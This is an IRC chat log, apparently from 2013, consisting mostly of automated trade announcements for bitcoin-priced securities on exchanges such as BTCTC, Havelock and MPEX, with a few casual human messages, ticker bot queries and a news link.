Jul 22 02:07:29 [BTCTC] [DMS.MINING] 40 @ 0.01625 = 0.65 BTC [+] Jul 22 02:07:30 [BTCTC] [DMS.MINING] 25 @ 0.01625 = 0.4063 BTC [+] Jul 22 02:07:31 [BTCTC] [DMS.MINING] 20 @ 0.01625 = 0.325 BTC [+] Jul 22 02:07:32 [BTCTC] [DMS.MINING] 50 @ 0.01639 = 0.8195 BTC [+] Jul 22 02:07:34 [BTCTC] [DMS.MINING] 143 @ 0.016399 = 2.3451 BTC [+] Jul 22 02:07:47 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003499 = 0.035 BTC [+] Jul 22 02:08:13 [BTCTC] [DMS.MINING] 68 @ 0.016399 = 1.1151 BTC [+] Jul 22 02:08:48 [BTCTC] [DMS.MINING] 40 @ 0.015001 = 0.6 BTC [-] Jul 22 02:09:31 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003299 = 0.033 BTC [-] Jul 22 02:09:31 [BTCTC] [AMC-PT] 90 @ 0.00271 = 0.2439 BTC [-] Jul 22 02:09:38 [BTCTC] [TAT.ASICMINER] 8 @ 0.045197 = 0.3616 BTC [+] Jul 22 02:09:41 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003298 = 0.033 BTC [-] Jul 22 02:10:20 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003297 = 0.033 BTC [-] Jul 22 02:10:20 [BTCTC] [TAT.VIRTUALMINE] 90 @ 0.003298 = 0.2968 BTC [+] Jul 22 02:10:30 [BTCTC] [DMS.PURCHASE] 40 @ 0.039477 = 1.5791 BTC [-] Jul 22 02:10:48 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003299 = 0.033 BTC [+] Jul 22 02:11:14 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003299 = 0.033 BTC [+] Jul 22 02:11:26 [BTCTC] [DMS.MINING] 40 @ 0.015003 = 0.6001 BTC [+] Jul 22 02:11:50 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003299 = 0.033 BTC [+] Jul 22 02:11:53 [BTCTC] [AMC-PT] 150 @ 0.002711 = 0.4067 BTC [+] Jul 22 02:12:18 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003299 = 0.033 BTC [+] Jul 22 02:12:52 [HAVELOCK] [AM100] 13 @ 0.044968 = 0.5846 BTC [-] Jul 22 02:14:52 [BTCTC] [AMC-PT] 25 @ 0.002711 = 0.0678 BTC [+] Jul 22 02:14:59 [BTCTC] [TAT.ASICMINER] 13 @ 0.045197 = 0.5876 BTC [+] Jul 22 02:17:10 [MPEX] [S.MPOE] 450 @ 0.00082708 = 0.3722 BTC [-] Jul 22 02:18:41 [BTCTC] [DMS.SELLING] 50 @ 0.02459 = 1.2295 BTC [+] Jul 22 02:25:49 [BTCTC] [BFMINES] 100 @ 0.003998 = 0.3998 BTC [-] Jul 22 02:25:51 [BTCTC] [BFMINES] 180 @ 0.003999 = 0.7198 BTC [+] Jul 22 02:25:52 [BTCTC] [BFMINES] 20 @ 0.004 = 0.08 BTC [+] Jul 22 02:26:50 [BTCTC] [DMS.SELLING] 50 @ 0.02459 = 1.2295 BTC [+] Jul 22 02:30:45 [BTCTC] [DMS.SELLING] 73 @ 0.02459 = 1.7951 BTC [+] Jul 22 02:31:54 [BTCTC] [DMS.SELLING] 25 @ 0.02459 = 0.6148 BTC [+] Jul 22 02:32:02 [BTCTC] [AMC-PT] 100 @ 0.00271 = 0.271 BTC [-] Jul 22 02:32:04 [BTCTC] [AMC-PT] 350 @ 0.002711 = 0.9489 BTC [+] Jul 22 02:33:24 [BTCTC] [TAT.ASICMINER] 12 @ 0.045193 = 0.5423 BTC [-] Jul 22 02:36:25 [BTCTC] [DMS.PURCHASE] 242 @ 0.039477 = 9.5534 BTC [-] Jul 22 02:37:23 [BTCTC] [BFMINES] 2 @ 0.004 = 0.008 BTC [+] Jul 22 02:39:14 [MPEX] [S.MPOE] 3019 @ 0.00083351 = 2.5164 BTC [+] Jul 22 02:39:16 [MPEX] [S.MPOE] 5031 @ 0.000834 = 4.1959 BTC [+] Jul 22 02:39:22 [BTCTC] [AMC-PT] 120 @ 0.002711 = 0.3253 BTC [+] Jul 22 02:39:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.045191 = 0.1356 BTC [-] Jul 22 02:39:52 [BTCTC] [TAT.ASICMINER] 7 @ 0.045192 = 0.3163 BTC [+] Jul 22 02:47:49 [BTCTC] [DMS.SELLING] 10 @ 0.02459 = 0.2459 BTC [+] Jul 22 02:55:00 [MPEX] [S.MPOE] 4700 @ 0.00082708 = 3.8873 BTC [-] Jul 22 02:59:21 [MPEX] [S.MPOE] 610 @ 0.000834 = 0.5087 BTC [+] Jul 22 02:59:25 [MPEX] [S.MPOE] 1589 @ 0.00083439 = 1.3258 BTC [+] Jul 22 03:04:20 [BTCTC] [AMC-PT] 425 @ 0.002713 = 1.153 BTC [+] Jul 22 03:04:21 [BTCTC] [AMC-PT] 288 @ 0.00273 = 0.7862 BTC [+] Jul 22 03:04:22 [BTCTC] [AMC-PT] 439 @ 0.00273 = 1.1985 BTC [+] Jul 22 03:04:24 [BTCTC] [AMC-PT] 500 @ 0.00273 = 1.365 BTC [+] Jul 22 03:04:25 [BTCTC] [AMC-PT] 1000 @ 0.002738 = 2.738 BTC [+] Jul 22 03:04:27 [BTCTC] [AMC-PT] 379 @ 0.002745 = 1.0404 BTC [+] Jul 22 03:04:28 [BTCTC] [AMC-PT] 20 @ 0.002745 = 0.0549 BTC [+] Jul 22 03:04:30 [BTCTC] [AMC-PT] 500 @ 0.002745 = 1.3725 BTC [+] Jul 22 03:04:31 [BTCTC] [AMC-PT] 5000 @ 0.002748 = 13.74 BTC [+] Jul 22 03:04:40 [BTCTC] [AMC-PT] 10000 @ 0.002749 = 27.49 BTC [+] Jul 22 03:09:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0033 BTC [+] Jul 22 03:16:59 [BTCTC] [DMS.SELLING] 20 @ 0.02459 = 0.4918 BTC [+] Jul 22 03:17:27 [MPEX] [S.MPOE] 3550 @ 0.00083439 = 2.9621 BTC [+] Jul 22 03:20:44 [BTCTC] [COGNITIVE] 7 @ 0.8 = 5.6 BTC [-] Jul 22 03:29:46 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00341 = 0.0171 BTC [+] Jul 22 03:38:06 [HAVELOCK] [SMG] 11 @ 0.00028999 = 0.0032 BTC [+] Jul 22 03:38:25 [BTCTC] [AMC-PT] 50 @ 0.0027 = 0.135 BTC [-] Jul 22 03:38:49 [HAVELOCK] [SMG] 140 @ 0.00028999 = 0.0406 BTC [+] Jul 22 03:41:20 [BTCTC] [DMS.PURCHASE] 5 @ 0.039477 = 0.1974 BTC [-] Jul 22 03:41:35 [BTCTC] [AMC-PT] 470 @ 0.0027 = 1.269 BTC [-] Jul 22 03:42:27 [BTCTC] [ASICMINER-PT] 1 @ 4.65001 BTC [+] Jul 22 03:42:30 [BTCTC] [DMS.SELLING] 4 @ 0.02459 = 0.0984 BTC [+] Jul 22 03:43:39 [BTCTC] [AMC-PT] 1500 @ 0.002745 = 4.1175 BTC [+] Jul 22 03:46:28 [BTCTC] [DMS.PURCHASE] 15 @ 0.039477 = 0.5922 BTC [-] Jul 22 03:49:26 [BTCTC] [DMS.SELLING] 20 @ 0.02469 = 0.4938 BTC [+] Jul 22 03:50:27 [BTCTC] [AMC-PT] 150 @ 0.002745 = 0.4118 BTC [+] Jul 22 03:52:32 [BTCTC] [AMC-PT] 450 @ 0.00271 = 1.2195 BTC [-] Jul 22 03:54:55 [BTCTC] [ASICMINER-PT] 1 @ 4.746 BTC [+] Jul 22 04:03:00 [BTCTC] [DMS.MINING] 10 @ 0.016098 = 0.161 BTC [+] Jul 22 04:03:51 [BTCTC] [DMS.MINING] 50 @ 0.016099 = 0.805 BTC [+] Jul 22 04:04:49 [BTCTC] [DMS.MINING] 40 @ 0.0161 = 0.644 BTC [+] Jul 22 04:05:30 [HAVELOCK] [SDSTM] 10 @ 0.0115 = 0.115 BTC [-] Jul 22 04:08:49 [BTCTC] [DMS.MINING] 40 @ 0.01618 = 0.6472 BTC [+] Jul 22 04:09:33 [MPEX] [S.MG] 30000 @ 0.00021 = 6.3 BTC [-] Jul 22 04:09:34 [MPEX] [S.MG] 10000 @ 0.000208 = 2.08 BTC [-] Jul 22 04:09:43 [MPEX] [S.MG] 1750 @ 0.000205 = 0.3588 BTC [-] Jul 22 04:10:00 [BTCTC] [DMS.MINING] 10 @ 0.01638 = 0.1638 BTC [+] Jul 22 04:11:40 [HAVELOCK] [SMG] 500 @ 0.000265 = 0.1325 BTC [-] Jul 22 04:11:43 [HAVELOCK] [SMG] 200 @ 0.000261 = 0.0522 BTC [-] Jul 22 04:11:45 [HAVELOCK] [SMG] 7 @ 0.0002601 = 0.0018 BTC [-] Jul 22 04:11:47 [HAVELOCK] [SMG] 1000 @ 0.00026008 = 0.2601 BTC [-] Jul 22 04:11:49 [HAVELOCK] [SMG] 1000 @ 0.000259 = 0.259 BTC [-] Jul 22 04:11:51 [HAVELOCK] [SMG] 45 @ 0.00025802 = 0.0116 BTC [-] Jul 22 04:11:53 [HAVELOCK] [SMG] 785 @ 0.0002503 = 0.1965 BTC [-] Jul 22 04:11:56 [HAVELOCK] [SMG] 1050 @ 0.0002502 = 0.2627 BTC [-] Jul 22 04:11:57 [HAVELOCK] [SMG] 40 @ 0.0002502 = 0.01 BTC [-] Jul 22 04:11:59 [HAVELOCK] [SMG] 1300 @ 0.0002501 = 0.3251 BTC [-] Jul 22 04:12:01 [HAVELOCK] [SMG] 4073 @ 0.00025 = 1.0183 BTC [-] Jul 22 04:14:15 [HAVELOCK] [SMG] 1000 @ 0.000251 = 0.251 BTC [+] Jul 22 04:14:17 [HAVELOCK] [SMG] 2053 @ 0.00025 = 0.5133 BTC [-] Jul 22 04:14:20 [HAVELOCK] [SMG] 50 @ 0.00025 = 0.0125 BTC [-] Jul 22 04:14:22 [HAVELOCK] [SMG] 3617 @ 0.000242 = 0.8753 BTC [-] Jul 22 04:14:24 [HAVELOCK] [SMG] 1000 @ 0.000241 = 0.241 BTC [-] Jul 22 04:14:26 [HAVELOCK] [SMG] 1000 @ 0.00024001 = 0.24 BTC [-] Jul 22 04:14:28 [HAVELOCK] [SMG] 200 @ 0.00024 = 0.048 BTC [-] Jul 22 04:14:30 [HAVELOCK] [SMG] 1080 @ 0.00024 = 0.2592 BTC [-] Jul 22 04:16:27 [HAVELOCK] [AM1] 1 @ 4.7 BTC [+] Jul 22 04:17:08 [HAVELOCK] [AM100] 5 @ 0.0443 = 0.2215 BTC [-] Jul 22 04:18:46 [BTCTC] [AMC-PT] 4 @ 0.002743 = 0.011 BTC [+] Jul 22 04:18:48 [BTCTC] [AMC-PT] 1300 @ 0.002744 = 3.5672 BTC [+] Jul 22 04:18:49 [BTCTC] [AMC-PT] 1130 @ 0.002745 = 3.1019 BTC [+] Jul 22 04:18:51 [BTCTC] [AMC-PT] 485 @ 0.002748 = 1.3328 BTC [+] Jul 22 04:18:52 [BTCTC] [AMC-PT] 2500 @ 0.00275 = 6.875 BTC [+] Jul 22 04:18:53 [BTCTC] [AMC-PT] 2000 @ 0.00275 = 5.5 BTC [+] Jul 22 04:19:34 [HAVELOCK] [AM100] 1 @ 0.04435 BTC [+] Jul 22 04:20:24 [BTCTC] [AMC-PT] 1000 @ 0.002763 = 2.763 BTC [+] Jul 22 04:20:28 [BTCTC] [AMC-PT] 3000 @ 0.00275 = 8.25 BTC [-] Jul 22 04:20:44 [BTCTC] [AMC-PT] 845 @ 0.002769 = 2.3398 BTC [+] Jul 22 04:21:04 [HAVELOCK] [AM100] 76 @ 0.044699 = 3.3971 BTC [+] Jul 22 04:21:08 [BTCTC] [AMC-PT] 1550 @ 0.00275 = 4.2625 BTC [-] Jul 22 04:21:20 [BTCTC] [AMC-PT] 579 @ 0.002779 = 1.609 BTC [+] Jul 22 04:21:22 [BTCTC] [AMC-PT] 2000 @ 0.002779 = 5.558 BTC [+] Jul 22 04:21:24 [HAVELOCK] [AM100] 1 @ 0.044699 BTC [+] Jul 22 04:21:44 [BTCTC] [AMC-PT] 1000 @ 0.002788 = 2.788 BTC [+] Jul 22 04:22:55 [BTCTC] [AMC-PT] 1 @ 0.0028 BTC [+] Jul 22 04:23:00 [BTCTC] [AMC-PT] 1 @ 0.0028 BTC [+] Jul 22 04:23:02 [BTCTC] [AMC-PT] 1600 @ 0.0028 = 4.48 BTC [+] Jul 22 04:23:56 [BTCTC] [AMC-PT] 16 @ 0.0028 = 0.0448 BTC [+] Jul 22 04:29:26 [BTCTC] [DMS.MINING] 57 @ 0.015093 = 0.8603 BTC [-] Jul 22 04:29:28 [BTCTC] [DMS.MINING] 2 @ 0.01502 = 0.03 BTC [-] Jul 22 04:29:29 [BTCTC] [DMS.MINING] 40 @ 0.01501 = 0.6004 BTC [-] Jul 22 04:29:31 [BTCTC] [DMS.MINING] 40 @ 0.015003 = 0.6001 BTC [-] Jul 22 04:29:32 [BTCTC] [DMS.MINING] 29 @ 0.015 = 0.435 BTC [-] Jul 22 04:29:33 [BTCTC] [DMS.MINING] 75 @ 0.015 = 1.125 BTC [-] Jul 22 04:29:35 [BTCTC] [DMS.MINING] 5 @ 0.015 = 0.075 BTC [-] Jul 22 04:29:39 [BTCTC] [DMS.MINING] 1 @ 0.015 BTC [-] Jul 22 04:29:41 [BTCTC] [DMS.MINING] 5 @ 0.015 = 0.075 BTC [-] Jul 22 04:29:43 [BTCTC] [DMS.MINING] 500 @ 0.015 = 7.5 BTC [-] Jul 22 04:29:45 [BTCTC] [DMS.MINING] 5 @ 0.015 = 0.075 BTC [-] Jul 22 04:29:50 [BTCTC] [DMS.MINING] 6 @ 0.015 = 0.09 BTC [-] Jul 22 04:29:52 [BTCTC] [DMS.MINING] 1 @ 0.01499 BTC [-] Jul 22 04:29:54 [BTCTC] [DMS.MINING] 20 @ 0.01471 = 0.2942 BTC [-] Jul 22 04:29:55 [BTCTC] [DMS.MINING] 2 @ 0.0147 = 0.0294 BTC [-] Jul 22 04:30:05 [BTCTC] [DMS.MINING] 10 @ 0.014211 = 0.1421 BTC [-] Jul 22 04:30:37 [BTCTC] [DMS.MINING] 10 @ 0.0142 = 0.142 BTC [-] Jul 22 04:30:37 [BTCTC] [DMS.MINING] 62 @ 0.01415 = 0.8773 BTC [-] Jul 22 04:30:37 [BTCTC] [DMS.MINING] 10 @ 0.014001 = 0.14 BTC [-] Jul 22 04:30:40 [BTCTC] [DMS.MINING] 500 @ 0.014 = 7 BTC [-] Jul 22 04:30:49 [BTCTC] [DMS.MINING] 37 @ 0.013933 = 0.5155 BTC [-] Jul 22 04:30:52 [BTCTC] [DMS.MINING] 1 @ 0.013933 BTC [-] Jul 22 04:33:26 [MPEX] [S.MPOE] 9550 @ 0.00083087 = 7.9348 BTC [-] Jul 22 04:33:28 [MPEX] [S.MPOE] 2675 @ 0.00082708 = 2.2124 BTC [-] Jul 22 04:33:33 [BTCTC] [DMS.SELLING] 15 @ 0.024738 = 0.3711 BTC [+] Jul 22 04:33:40 [MPEX] [S.MPOE] 7600 @ 0.00082586 = 6.2765 BTC [-] Jul 22 04:33:41 [MPEX] [S.MPOE] 2700 @ 0.00082493 = 2.2273 BTC [-] Jul 22 04:33:55 [MPEX] [S.MPOE] 4548 @ 0.00082383 = 3.7468 BTC [-] Jul 22 04:33:57 [MPEX] [S.MPOE] 4548 @ 0.00082383 = 3.7468 BTC [-] Jul 22 04:33:59 [BTCTC] [AMC-PT] 250 @ 0.0028 = 0.7 BTC [+] Jul 22 04:34:00 [MPEX] [S.MPOE] 1000 @ 0.0008 = 0.8 BTC [-] Jul 22 04:34:07 [MPEX] [S.MPOE] 10000 @ 0.0008 = 8 BTC [-] Jul 22 04:34:13 [MPEX] [S.MPOE] 4773 @ 0.00077252 = 3.6872 BTC [-] Jul 22 04:34:15 [MPEX] [S.MPOE] 30320 @ 0.00077251 = 23.4225 BTC [-] Jul 22 04:34:17 [MPEX] [S.MPOE] 1419599 @ 0.0007725 = 1096.6402 BTC [-] Jul 22 04:36:20 [BTCTC] [DMS.SELLING] 85 @ 0.024738 = 2.1027 BTC [+] Jul 22 04:36:48 [BTCTC] [AMC-PT] 1534 @ 0.0028 = 4.2952 BTC [+] Jul 22 04:36:49 [BTCTC] [AMC-PT] 1000 @ 0.002814 = 2.814 BTC [+] Jul 22 04:36:50 [BTCTC] [AMC-PT] 1000 @ 0.002839 = 2.839 BTC [+] Jul 22 04:36:52 [BTCTC] [AMC-PT] 3466 @ 0.002845 = 9.8608 BTC [+] Jul 22 04:40:51 [BTCTC] [DMS.SELLING] 15 @ 0.024739 = 0.3711 BTC [+] Jul 22 04:40:53 [BTCTC] [AMC-PT] 5 @ 0.002845 = 0.0142 BTC [+] Jul 22 04:47:28 [BTCTC] [S.MPOE-PT] 29 @ 0.00088 = 0.0255 BTC [-] Jul 22 04:47:31 so if you google Dempsey you get some schmuck born in the 80s Jul 22 04:47:35 what the fuck is wrong with this world. Jul 22 04:47:53 [BTCTC] [BASIC-MINING] 10 @ 0.675 = 6.75 BTC [-] Jul 22 04:48:22 and who should you get? Jul 22 04:48:48 big selloff on s.mpoe just now, what's up with that? Jul 22 04:49:12 [BTCTC] [COGNITIVE] 1 @ 0.819948 BTC [+] Jul 22 04:50:51 [BTCTC] [TAT.ASICMINER] 4 @ 0.045548 = 0.1822 BTC [+] Jul 22 04:51:00 [HAVELOCK] [SDSTM] 3 @ 0.0111 = 0.0333 BTC [-] Jul 22 04:51:03 [BTCTC] [COGNITIVE] 2 @ 0.819949 = 1.6399 BTC [+] Jul 22 04:51:04 [HAVELOCK] [SDSTM] 9 @ 0.0111 = 0.0999 BTC [-] Jul 22 04:51:06 [HAVELOCK] [SDSTM] 1 @ 0.01106 BTC [-] Jul 22 04:51:08 [BTCTC] [COGNITIVE] 1 @ 0.82 BTC [+] Jul 22 04:51:09 [HAVELOCK] [SDSTM] 6 @ 0.011 = 0.066 BTC [-] Jul 22 04:51:10 [HAVELOCK] [SDSTM] 3 @ 0.0109 = 0.0327 BTC [-] Jul 22 04:51:13 [HAVELOCK] [SDSTM] 3 @ 0.01082001 = 0.0325 BTC [-] Jul 22 04:51:15 [HAVELOCK] [SDSTM] 100 @ 0.0108 = 1.08 BTC [-] Jul 22 04:51:17 [BTCTC] [COGNITIVE] 1 @ 0.82 BTC [+] Jul 22 04:51:18 [HAVELOCK] [SDSTM] 75 @ 0.0107 = 0.8025 BTC [-] Jul 22 04:51:20 [HAVELOCK] [SDSTM] 3 @ 0.0105 = 0.0315 BTC [-] Jul 22 04:52:46 [HAVELOCK] [AM100] 20 @ 0.044698 = 0.894 BTC [-] Jul 22 04:53:58 [BTCTC] [BITVPS] 5 @ 0.002001 = 0.01 BTC [-] Jul 22 04:54:25 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0036 = 0.0072 BTC [+] Jul 22 04:55:01 [HAVELOCK] [SDSTM] 9 @ 0.011 = 0.099 BTC [+] Jul 22 04:55:21 [BTCTC] [BASIC-MINING] 1 @ 0.695998 BTC [+] Jul 22 04:56:18 [HAVELOCK] [SMG] 24 @ 0.0002875 = 0.0069 BTC [+] Jul 22 04:58:24 [BTCTC] [AMC-PT] 100 @ 0.002839 = 0.2839 BTC [-] Jul 22 04:58:42 [BTCTC] [AMC-PT] 22 @ 0.002801 = 0.0616 BTC [-] Jul 22 05:01:03 Looking for a 15 BTC loan tied to BTC/GOXUSD rate. Can secure it with 100% collateral. Jul 22 05:04:00 [BTCTC] [DMS.MINING] 10 @ 0.0149 = 0.149 BTC [+] Jul 22 05:04:01 [BTCTC] [DMS.MINING] 56 @ 0.015093 = 0.8452 BTC [+] Jul 22 05:04:03 [BTCTC] [DMS.MINING] 20 @ 0.0154 = 0.308 BTC [+] Jul 22 05:04:04 [BTCTC] [DMS.MINING] 14 @ 0.0157 = 0.2198 BTC [+] Jul 22 05:07:42 [BTCTC] [LTC-ATF.B2] 25 @ 0.01 = 0.25 BTC [+] Jul 22 05:09:50 [BTCTC] [AMC-PT] 83 @ 0.002839 = 0.2356 BTC [+] Jul 22 05:11:52 [BTCTC] [AMC-PT] 117 @ 0.002839 = 0.3322 BTC [+] Jul 22 05:13:03 !ticker m s.mg Jul 22 05:13:04 [MPEX:S.MG] 1D: 0.000185 / 0.00020191 / 0.00026901 (77350 shares, 15.62 BTC), 7D: 0.000181 / 0.00021207 / 0.0004 (1140308 shares, 241.83 BTC), 30D: 0.00012451 / 0.00020252 / 0.0004 (1398760 shares, 283.28 BTC) Jul 22 05:13:52 ;;ticker Jul 22 05:13:53 MtGox BTCUSD ticker | Best bid: 90.19203, Best ask: 90.90000, Bid-ask spread: 0.70797, Last trade: 90.85000, 24 hour volume: 7875.61576957, 24 hour low: 88.00000, 24 hour high: 92.00000, 24 hour vwap: 89.40112 Jul 22 05:14:16 [HAVELOCK] [SMG] 176 @ 0.0002875 = 0.0506 BTC [+] Jul 22 05:14:18 [HAVELOCK] [SMG] 824 @ 0.00028788 = 0.2372 BTC [+] Jul 22 05:14:20 [BTCTC] [AMC-PT] 290 @ 0.00284 = 0.8236 BTC [+] Jul 22 05:15:47 [BTCTC] [BITVPS] 3 @ 0.002 = 0.006 BTC [-] Jul 22 05:17:05 !ticker btctc bitvps Jul 22 05:17:07 [BTCT:BITVPS] 1D: 0.002 / 0.00201 / 0.002089 (17 shares, 0 BTC), 7D: 0.001621 / 0.00177 / 0.0021 (9391 shares, 16.6 BTC), 30D: 0.00089 / 0.00161 / 0.0035 (58045 shares, 93.6 BTC) Jul 22 05:18:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.045546 BTC [-] Jul 22 05:20:27 [BTCTC] [BTC-BOND] 329 @ 0.009996 = 3.2887 BTC [+] Jul 22 05:20:29 [BTCTC] [BTC-BOND] 100 @ 0.009998 = 0.9998 BTC [+] Jul 22 05:22:47 [BTCTC] [AMC-PT] 1 @ 0.0028 BTC [-] Jul 22 05:22:49 [BTCTC] [AMC-PT] 1 @ 0.00277 BTC [-] Jul 22 05:22:58 [HAVELOCK] [AM100] 33 @ 0.043112 = 1.4227 BTC [-] Jul 22 05:23:16 [BTCTC] [ASICMINER-PT] 1 @ 4.757999 BTC [+] Jul 22 05:23:26 [BTCTC] [AMC-PT] 99 @ 0.00277 = 0.2742 BTC [-] Jul 22 05:23:28 [BTCTC] [AMC-PT] 2 @ 0.002756 = 0.0055 BTC [-] Jul 22 05:23:29 [BTCTC] [AMC-PT] 15 @ 0.002755 = 0.0413 BTC [-] Jul 22 05:23:32 [BTCTC] [AMC-PT] 10 @ 0.002752 = 0.0275 BTC [-] Jul 22 05:23:33 [BTCTC] [AMC-PT] 100 @ 0.002751 = 0.2751 BTC [-] Jul 22 05:23:34 [BTCTC] [AMC-PT] 74 @ 0.00275 = 0.2035 BTC [-] Jul 22 05:24:23 [BTCTC] [TAT.ASICMINER] 49 @ 0.045546 = 2.2318 BTC [-] Jul 22 05:25:51 [BTCTC] [TAT.ASICMINER] 11 @ 0.045547 = 0.501 BTC [+] Jul 22 05:31:40 [BTCTC] [AMC-PT] 7 @ 0.002839 = 0.0199 BTC [+] Jul 22 05:32:00 [BTCTC] [AMC-PT] 93 @ 0.002839 = 0.264 BTC [+] Jul 22 05:32:02 [BTCTC] [AMC-PT] 710 @ 0.00284 = 2.0164 BTC [+] Jul 22 05:32:03 [BTCTC] [AMC-PT] 50 @ 0.00284 = 0.142 BTC [+] Jul 22 05:32:05 [BTCTC] [AMC-PT] 6946 @ 0.002845 = 19.7614 BTC [+] Jul 22 05:32:06 [BTCTC] [AMC-PT] 1000 @ 0.002845 = 2.845 BTC [+] Jul 22 05:32:08 [BTCTC] [AMC-PT] 500 @ 0.00285 = 1.425 BTC [+] Jul 22 05:32:09 [BTCTC] [AMC-PT] 1000 @ 0.002864 = 2.864 BTC [+] Jul 22 05:32:16 [BTCTC] [AMC-PT] 1000 @ 0.002889 = 2.889 BTC [+] Jul 22 05:32:18 [BTCTC] [AMC-PT] 1 @ 0.002899 BTC [+] Jul 22 05:32:20 [BTCTC] [AMC-PT] 150 @ 0.002899 = 0.4349 BTC [+] Jul 22 05:32:21 [BTCTC] [AMC-PT] 100 @ 0.0029 = 0.29 BTC [+] Jul 22 05:32:23 [BTCTC] [AMC-PT] 100 @ 0.0029 = 0.29 BTC [+] Jul 22 05:32:24 [BTCTC] [AMC-PT] 1000 @ 0.002914 = 2.914 BTC [+] Jul 22 05:32:25 [BTCTC] [AMC-PT] 598 @ 0.002925 = 1.7492 BTC [+] Jul 22 05:32:27 [BTCTC] [AMC-PT] 1000 @ 0.002939 = 2.939 BTC [+] Jul 22 05:32:28 [BTCTC] [AMC-PT] 1000 @ 0.002964 = 2.964 BTC [+] Jul 22 05:32:28 [BTCTC] [AMC-PT] 1000 @ 0.002989 = 2.989 BTC [+] Jul 22 05:32:30 [BTCTC] [AMC-PT] 767 @ 0.002998 = 2.2995 BTC [+] Jul 22 05:32:31 [BTCTC] [AMC-PT] 200 @ 0.002999 = 0.5998 BTC [+] Jul 22 05:32:32 [BTCTC] [AMC-PT] 100 @ 0.003 = 0.3 BTC [+] Jul 22 05:32:33 [BTCTC] [AMC-PT] 100 @ 0.003 = 0.3 BTC [+] Jul 22 05:32:34 [BTCTC] [AMC-PT] 400 @ 0.003 = 1.2 BTC [+] Jul 22 05:32:36 [BTCTC] [AMC-PT] 500 @ 0.003 = 1.5 BTC [+] Jul 22 05:32:38 [BTCTC] [AMC-PT] 100 @ 0.003 = 0.3 BTC [+] Jul 22 05:32:39 [BTCTC] [AMC-PT] 377 @ 0.003 = 1.131 BTC [+] Jul 22 05:32:41 [BTCTC] [AMC-PT] 250 @ 0.003013 = 0.7533 BTC [+] Jul 22 05:32:42 [BTCTC] [AMC-PT] 1000 @ 0.003015 = 3.015 BTC [+] Jul 22 05:32:42 [BTCTC] [AMC-PT] 1000 @ 0.00304 = 3.04 BTC [+] Jul 22 05:32:44 [BTCTC] [AMC-PT] 100 @ 0.0031 = 0.31 BTC [+] Jul 22 05:32:45 [BTCTC] [AMC-PT] 500 @ 0.0031 = 1.55 BTC [+] Jul 22 05:32:46 [BTCTC] [AMC-PT] 100 @ 0.0032 = 0.32 BTC [+] Jul 22 05:32:49 [BTCTC] [AMC-PT] 801 @ 0.0032 = 2.5632 BTC [+] Jul 22 05:32:51 [BTCTC] [AMC-PT] 91 @ 0.0032 = 0.2912 BTC [+] Jul 22 05:32:52 [BTCTC] [AMC-PT] 100 @ 0.00325 = 0.325 BTC [+] Jul 22 05:32:54 [BTCTC] [AMC-PT] 150 @ 0.003265 = 0.4898 BTC [+] Jul 22 05:32:55 [BTCTC] [AMC-PT] 400 @ 0.003299 = 1.3196 BTC [+] Jul 22 05:32:56 [BTCTC] [AMC-PT] 100 @ 0.0033 = 0.33 BTC [+] Jul 22 05:32:57 [BTCTC] [AMC-PT] 1000 @ 0.0033 = 3.3 BTC [+] Jul 22 05:32:58 [BTCTC] [AMC-PT] 500 @ 0.0033 = 1.65 BTC [+] Jul 22 05:33:00 [BTCTC] [AMC-PT] 600 @ 0.0033 = 1.98 BTC [+] Jul 22 05:33:01 [BTCTC] [AMC-PT] 3039 @ 0.0033 = 10.0287 BTC [+] Jul 22 05:34:36 [BTCTC] [AMC-PT] 2 @ 0.00329 = 0.0066 BTC [-] Jul 22 05:34:45 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.003576 = 0.0465 BTC [-] Jul 22 05:35:23 [BTCTC] [TAT.ASICMINER] 50 @ 0.045546 = 2.2773 BTC [-] Jul 22 05:35:43 [BTCTC] [TAT.ASICMINER] 27 @ 0.045555 = 1.23 BTC [+] Jul 22 05:36:16 [BTCTC] [TAT.ASICMINER] 9 @ 0.045674 = 0.4111 BTC [+] Jul 22 05:36:19 [BTCTC] [DMS.MINING] 4 @ 0.01565 = 0.0626 BTC [-] Jul 22 05:36:19 [BTCTC] [AMC-PT] 2 @ 0.002811 = 0.0056 BTC [-] Jul 22 05:36:22 [BTCTC] [AMC-PT] 98 @ 0.00281 = 0.2754 BTC [-] Jul 22 05:37:41 [BTCTC] [TAT.ASICMINER] 13 @ 0.045673 = 0.5937 BTC [-] Jul 22 05:39:29 [BTCTC] [AMC-PT] 420 @ 0.0031 = 1.302 BTC [+] Jul 22 05:39:31 [BTCTC] [AMC-PT] 300 @ 0.0032 = 0.96 BTC [+] Jul 22 05:39:32 [BTCTC] [AMC-PT] 10 @ 0.003299 = 0.033 BTC [+] Jul 22 05:39:34 [BTCTC] [AMC-PT] 990 @ 0.0033 = 3.267 BTC [+] Jul 22 05:41:08 [HAVELOCK] [AM100] 10 @ 0.044699 = 0.447 BTC [+] Jul 22 05:41:19 [BTCTC] [LTC-ATF.B2] 28 @ 0.01 = 0.28 BTC [+] Jul 22 05:41:28 [BTCTC] [AMC-PT] 2 @ 0.00329 = 0.0066 BTC [-] Jul 22 05:41:30 [BTCTC] [AMC-PT] 298 @ 0.0033 = 0.9834 BTC [+] Jul 22 05:48:16 [BTCTC] [COGNITIVE] 1 @ 0.82 BTC [+] Jul 22 05:51:06 [BTCTC] [AMC-PT] 4 @ 0.003297 = 0.0132 BTC [-] Jul 22 05:51:42 http://money.cnn.com/2013/06/11/news/economy/cash-only-doctors/index.html Jul 22 05:51:45 Cash-only doctors abandon the insurance system - Jun. 11, 2013 Jul 22 05:56:42 [BTCTC] [AMC-PT] 20 @ 0.003001 = 0.06 BTC [-] Jul 22 05:56:44 [BTCTC] [AMC-PT] 50 @ 0.003 = 0.15 BTC [-] Jul 22 05:56:47 [BTCTC] [AMC-PT] 40 @ 0.003255 = 0.1302 